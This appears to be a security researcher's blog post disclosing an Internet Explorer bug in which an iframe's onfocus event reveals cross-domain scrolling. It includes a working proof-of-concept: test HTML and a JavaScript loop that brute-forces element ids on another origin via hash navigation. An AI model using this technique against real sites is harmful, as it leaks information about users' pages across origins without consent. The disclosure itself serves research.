X-Domain scroll detection on IE using focus

This is a pretty cool bug. I use the focus event on an iframe to detect if the iframe has been scrolled x-domain. It’s because IE fires the onfocus event of the iframe when the scroll occurs. This means using 1 network request we can discover if a site contains a particular id provided the page scrolls inside the iframe. Using multiple iframes you could quite easily bruteforce larger numbers or maybe a dictionary list of words and because we are using hash the future requests aren’t sent to the server.

First we need a page with an id we can scroll to.

<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<p>test</p>
<div id=1337>target</div>

When visiting this page it should jump to #1337 provided the window is small enough.

Next we create an iframe and attach an onfocus event:

<iframe src="http://hackvertor.co.uk/scroll/test.html" id="x" onfocus="alert('the iframe scrolled to: '+window.id);clearTimeout(timer)" name="x"></iframe>

Now we need to create the clicks to trigger the onfocus event and produce the scroll.


id=0;
var anchor = document.createElement('a');
anchor.target="x";
document.body.appendChild(anchor);

timer=setTimeout(function f(){
id++;
document.getElementById('pos').innerText = id;
anchor.href='http://hackvertor.co.uk/scroll/test.html#'+id;
anchor.click();
if(id<10000) { timer=setTimeout(f,0); } },0)

The code keeps calling itself until 10,000 iterations or until the onfocus event fires and clears the timeout. Which it does on IE with 1337 🙂

PoC

Comments are closed :( too much spam. If you want to contact me about any article please email or tweet me.